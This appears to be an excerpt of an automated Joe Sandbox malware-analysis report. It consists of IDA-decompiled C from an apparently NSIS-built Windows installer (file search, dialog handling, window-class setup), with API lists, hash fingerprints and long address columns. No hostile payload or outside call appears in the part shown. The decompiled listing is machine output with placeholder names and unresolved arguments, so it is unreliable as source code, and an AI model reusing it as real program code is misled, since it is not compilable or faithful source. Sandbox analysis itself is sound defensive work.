                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                            • API String ID: 542301482-501415292
                                                                                                                                                                                                                            • Opcode ID: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                                                                                                                                                            • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040699E(WCHAR* _a4) {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                                                                                                                                                                            				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				FindClose(_t2);
                                                                                                                                                                                                                            				return 0x426798;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(7620FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004069A9
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                                                                                                                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                                                                                                            			E0040290B(short __ebx, short* __edi) {
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
                                                                                                                                                                                                                            				if(_t8 != 0xffffffff) {
                                                                                                                                                                                                                            					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                                                                                                                                            					_push(_t21 - 0x2b0);
                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                            					E00406668();
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                                                                                                                                            					 *__edi = __ebx;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph of the function at 004040C5; nodes marked as executed or not executed]
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                                                                                                                                                            				struct HWND__* _v28;
                                                                                                                                                                                                                            				void* _v80;
                                                                                                                                                                                                                            				void* _v84;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                            				struct HWND__* _t48;
                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                            				struct HWND__* _t73;
                                                                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                                                                            				struct HWND__* _t91;
                                                                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                                                                            				int _t103;
                                                                                                                                                                                                                            				signed int _t117;
                                                                                                                                                                                                                            				int _t118;
                                                                                                                                                                                                                            				int _t122;
                                                                                                                                                                                                                            				signed int _t124;
                                                                                                                                                                                                                            				struct HWND__* _t127;
                                                                                                                                                                                                                            				struct HWND__* _t128;
                                                                                                                                                                                                                            				int _t129;
                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                            				long _t133;
                                                                                                                                                                                                                            				int _t135;
                                                                                                                                                                                                                            				int _t136;
                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t130 = _a8;
                                                                                                                                                                                                                            				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                                                                                                                                                            					_t34 = _a12;
                                                                                                                                                                                                                            					_t127 = _a4;
                                                                                                                                                                                                                            					__eflags = _t130 - 0x110;
                                                                                                                                                                                                                            					 *0x423730 = _t34;
                                                                                                                                                                                                                            					if(_t130 == 0x110) {
                                                                                                                                                                                                                            						 *0x42a268 = _t127;
                                                                                                                                                                                                                            						 *0x423744 = GetDlgItem(_t127, 1);
                                                                                                                                                                                                                            						_t91 = GetDlgItem(_t127, 2);
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(0x1c);
                                                                                                                                                                                                                            						 *0x421710 = _t91;
                                                                                                                                                                                                                            						E004045C4(_t127);
                                                                                                                                                                                                                            						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                                                                                                                                                                                            						 *0x42922c = E0040140B(4);
                                                                                                                                                                                                                            						_t34 = 1;
                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                            						 *0x423730 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t124 =  *0x40a39c; // 0x0
                                                                                                                                                                                                                            					_t136 = 0;
                                                                                                                                                                                                                            					_t133 = (_t124 << 6) +  *0x42a280;
                                                                                                                                                                                                                            					__eflags = _t124;
                                                                                                                                                                                                                            					if(_t124 < 0) {
                                                                                                                                                                                                                            						L36:
                                                                                                                                                                                                                            						E00404610(0x40b);
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t36 =  *0x423730;
                                                                                                                                                                                                                            							 *0x40a39c =  *0x40a39c + _t36;
                                                                                                                                                                                                                            							_t133 = _t133 + (_t36 << 6);
                                                                                                                                                                                                                            							_t38 =  *0x40a39c; // 0x0
                                                                                                                                                                                                                            							__eflags = _t38 -  *0x42a284;
                                                                                                                                                                                                                            							if(_t38 ==  *0x42a284) {
                                                                                                                                                                                                                            								E0040140B(1);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *0x42922c - _t136;
                                                                                                                                                                                                                            							if( *0x42922c != _t136) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                                                                                                                                                                            							if(__eflags >= 0) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t117 =  *(_t133 + 0x14);
                                                                                                                                                                                                                            							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                                                                                                                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                                                                                                                                            							_push(0xfffffc19);
                                                                                                                                                                                                                            							E004045C4(_t127);
                                                                                                                                                                                                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                                                                                                                                            							_push(0xfffffc1b);
                                                                                                                                                                                                                            							E004045C4(_t127);
                                                                                                                                                                                                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                                                                                                                                            							_push(0xfffffc1a);
                                                                                                                                                                                                                            							E004045C4(_t127);
                                                                                                                                                                                                                            							_t48 = GetDlgItem(_t127, 3);
                                                                                                                                                                                                                            							__eflags =  *0x42a2ec - _t136;
                                                                                                                                                                                                                            							_v28 = _t48;
                                                                                                                                                                                                                            							if( *0x42a2ec != _t136) {
                                                                                                                                                                                                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                                                                                                                            								__eflags = _t117;
                                                                                                                                                                                                                            							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238); // executed
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
                                                                                                                                                                                                                            										__eflags =  *0x40a39c - _t136; // 0x0
                                                                                                                                                                                                                            										if(__eflags <= 0) {
                                                                                                                                                                                                                            											goto L27;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_push(0xffffffff);
                                                                                                                                                                                                                            										goto L24;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_push(_t135);
                                                                                                                                                                                                                            									goto L24;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                                                                                                                                                            								_t103 = IsWindowEnabled(_t128);
                                                                                                                                                                                                                            								__eflags = _t103;
                                                                                                                                                                                                                            								if(_t103 == 0) {
                                                                                                                                                                                                                            									L63:
                                                                                                                                                                                                                            									return 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							SetWindowLongW(_t127, _t136, _t136);
                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						DestroyWindow( *0x429238);
                                                                                                                                                                                                                            						 *0x429238 = _t122;
                                                                                                                                                                                                                            						L60:
                                                                                                                                                                                                                            						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                                                                                                                                                                                                            							ShowWindow(_t127, 0xa); // executed
                                                                                                                                                                                                                            							 *0x425748 = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L63;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                                                                            						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                                                                                                                                                                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                                                                                                                                                            							L28:
                                                                                                                                                                                                                            							return E0040462B(_a8, _t122, _a16);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							ShowWindow(_t127, 4);
                                                                                                                                                                                                                            							goto L8;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040446c
                                                                                                                                                                                                                            0x00404470
                                                                                                                                                                                                                            0x00404495
                                                                                                                                                                                                                            0x0040449b
                                                                                                                                                                                                                            0x004044a1
                                                                                                                                                                                                                            0x004044a3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004044c9
                                                                                                                                                                                                                            0x004044cf
                                                                                                                                                                                                                            0x004044d1
                                                                                                                                                                                                                            0x004044d6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004044dc
                                                                                                                                                                                                                            0x004044df
                                                                                                                                                                                                                            0x004044e2
                                                                                                                                                                                                                            0x004044f9
                                                                                                                                                                                                                            0x00404505
                                                                                                                                                                                                                            0x0040451e
                                                                                                                                                                                                                            0x00404528
                                                                                                                                                                                                                            0x0040452d
                                                                                                                                                                                                                            0x00404533
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040453d
                                                                                                                                                                                                                            0x00404548
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404548
                                                                                                                                                                                                                            0x00404472
                                                                                                                                                                                                                            0x00404478
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040447e
                                                                                                                                                                                                                            0x00404484
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040448a
                                                                                                                                                                                                                            0x0040445e
                                                                                                                                                                                                                            0x00404555
                                                                                                                                                                                                                            0x00404561
                                                                                                                                                                                                                            0x00404568
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042b3
                                                                                                                                                                                                                            0x004042b3
                                                                                                                                                                                                                            0x004042b6
                                                                                                                                                                                                                            0x004042e9
                                                                                                                                                                                                                            0x004042e9
                                                                                                                                                                                                                            0x004042eb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042eb
                                                                                                                                                                                                                            0x004042bc
                                                                                                                                                                                                                            0x004042c1
                                                                                                                                                                                                                            0x004042c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042d3
                                                                                                                                                                                                                            0x004042db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004042e1
                                                                                                                                                                                                                            0x004040e9
                                                                                                                                                                                                                            0x004040e9
                                                                                                                                                                                                                            0x004040ed
                                                                                                                                                                                                                            0x004040f2
                                                                                                                                                                                                                            0x00404101
                                                                                                                                                                                                                            0x00404101
                                                                                                                                                                                                                            0x00404107
                                                                                                                                                                                                                            0x0040410e
                                                                                                                                                                                                                            0x00404152
                                                                                                                                                                                                                            0x00404158
                                                                                                                                                                                                                            0x00404171
                                                                                                                                                                                                                            0x00404174
                                                                                                                                                                                                                            0x00404187
                                                                                                                                                                                                                            0x0040418d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404193
                                                                                                                                                                                                                            0x0040419e
                                                                                                                                                                                                                            0x004041a0
                                                                                                                                                                                                                            0x004041a2
                                                                                                                                                                                                                            0x004041c1
                                                                                                                                                                                                                            0x004041c1
                                                                                                                                                                                                                            0x004041c4
                                                                                                                                                                                                                            0x004041c9
                                                                                                                                                                                                                            0x004041cc
                                                                                                                                                                                                                            0x004041dc
                                                                                                                                                                                                                            0x004041dd
                                                                                                                                                                                                                            0x004041df
                                                                                                                                                                                                                            0x00404215
                                                                                                                                                                                                                            0x00404225
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404225
                                                                                                                                                                                                                            0x004041e1
                                                                                                                                                                                                                            0x004041e7
                                                                                                                                                                                                                            0x00404200
                                                                                                                                                                                                                            0x00404205
                                                                                                                                                                                                                            0x00404207
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404209
                                                                                                                                                                                                                            0x004041f5
                                                                                                                                                                                                                            0x004041f5
                                                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041f7
                                                                                                                                                                                                                            0x004041ea
                                                                                                                                                                                                                            0x004041ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041ef
                                                                                                                                                                                                                            0x004041ce
                                                                                                                                                                                                                            0x004041d4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004041d6
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00404121
                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00404160
                                                                                                                                                                                                                            • SetWindowLongW.USER32 ref: 00404179
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404198
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 0040425E
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404268
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404379
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                                                                                                                                                            • EnableMenuItem.USER32 ref: 004043E4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                            • String ID: H7B
                                                                                                                                                                                                                            • API String ID: 3618520773-2300413410
                                                                                                                                                                                                                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                                                                                                                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 314 403d9d-403dc6 call 403fed call 40603f 304->314 310 403d92-403d98 lstrcatW 305->310 311 403d7c-403d8d call 406536 305->311 310->314 311->310 319 403e58-403e60 call 40603f 314->319 320 403dcc-403dd1 314->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 322 403dd7-403dff call 406536 320->322 322->319 328 403e01-403e05 322->328 326->327 330 403f14-403f1c call 40140b 327->330 331 403e95-403ec5 RegisterClassW 327->331 332 403e17-403e23 lstrlenW 328->332 333 403e07-403e14 call 405f64 328->333 344 403f26-403f31 call 403fed 330->344 345 403f1e-403f21 330->345 334 403fe3 331->334 335 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->335 339 403e25-403e33 lstrcmpiW 332->339 340 403e4b-403e53 call 405f37 call 406668 332->340 333->332 338 403fe5-403fec 334->338 335->330 339->340 343 403e35-403e3f GetFileAttributesW 339->343 340->319 347 403e41-403e43 343->347 348 403e45-403e46 call 405f83 343->348 354 403f37-403f51 ShowWindow call 4069c5 344->354 355 403fba-403fbb call 40579d 344->355 345->338 347->340 347->348 348->340 360 403f53-403f58 call 4069c5 354->360 361 403f5d-403f6f GetClassInfoW 354->361 359 403fc0-403fc2 355->359 362 403fc4-403fca 359->362 363 403fdc-403fde call 40140b 359->363 360->361 366 403f71-403f81 GetClassInfoW RegisterClassW 361->366 367 403f87-403faa DialogBoxParamW call 40140b 361->367 362->345 368 403fd0-403fd7 call 40140b 362->368 363->334 366->367 372 403faf-403fb8 call 403c67 367->372 368->345 372->338
                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                            			E00403D17(void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
